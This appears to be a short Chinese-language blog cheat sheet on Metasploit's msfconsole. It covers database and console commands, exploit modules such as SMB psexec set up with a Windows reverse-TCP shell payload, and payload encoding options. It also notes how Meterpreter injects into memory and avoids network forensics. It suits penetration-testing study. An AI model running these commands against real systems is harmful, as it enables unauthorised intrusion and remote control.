msfconsole.md

msfconsole

数据库

systemctl start postgresql.service
db_status
db_rebuild_cache#已停用
msfdb reinit
db_connect
db_disconnect
db_nmap
hosts
services -S 445
creds
vulns
db_import
db_export

控制台

set
unset
setg #g --> global
unsetg
save #保存配置信息
run/exploit #生成job
show targets
set targets 34
show payloads
sessions #显示会话
sessions -i [id]
jobs/kill
load/unload/loadpath #插件加载(外部扫描器)
route #指定sessions路由
irb #开发接口
resource #类似运行1.sh resource .rc <==> msfconsole -r r.rc

Exploit模块

Active exploit:
#攻击者主动发送攻击代码,触发被攻击者的漏洞
use exploit/windows/smb/psexec
set payload windows/shell/reverse_tcp
Passive exploit:
#被攻击者客户端存在漏洞,向服务器发送请求,服务器回应攻击代码,导致客户端被攻击
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set payload windows/shell/reverse_tcp

生成payload

generate:
-b #过滤坏字符 encoder
-e #指定encoder
-t #指定输出格式
-s
NOP:
next-operation
#无任何操作,cpu直接跳转下一命令
show encoders

Meterpreter

#完全基于内存dll注入
#注入到系统进程
#基于stager建立加密的TLS/1.0通信隧道(避免网络取证)
#服务端使用c语言编写
#客户端基于ruby的全特性api

信息收集

  • auxiliary/scanner

本文作者:nsfoxer

本文链接:https://www.cnblogs.com/nsfoxer/p/16317322.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   nsfoxer  阅读(29)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· Vue3状态管理终极指南:Pinia保姆级教程
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起